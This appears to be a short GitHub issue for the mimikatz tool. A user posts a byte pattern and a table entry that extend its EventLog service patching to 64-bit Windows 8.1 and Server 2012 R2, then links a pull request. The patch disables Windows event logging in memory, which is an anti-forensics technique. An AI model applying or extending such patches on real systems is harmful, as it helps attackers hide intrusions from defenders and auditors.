eventlog service patching does not support win8.1 64bit

[Speedi13]

For somereason it only supports x86 (32bit) win8 & win8.1

The following code just needs to be added for win8.1 support. I tested it works on x86_64 (64bit) win8.1 and WinServer2012R2 https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_event.c#L26

BYTE PTRN_WN63_Channel__ActualProcessEvent[]    = {0x48, 0x8B, 0xC4, 0x57, 0x48, 0x83, 0xEC, 0x50, 0x48, 0xC7, 0x40, 0xC8, 0xFE, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18};

https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_event.c#L34

{KULL_M_WIN_BUILD_BLUE,     {sizeof(PTRN_WN63_Channel__ActualProcessEvent), PTRN_WN63_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, {  0}},

It would be cool if that gets added to mimikatz, it's an awesome tool thank you for that :smiley: .

[Speedi13]

I made a pull request for that https://github.com/gentilkiwi/mimikatz/pull/190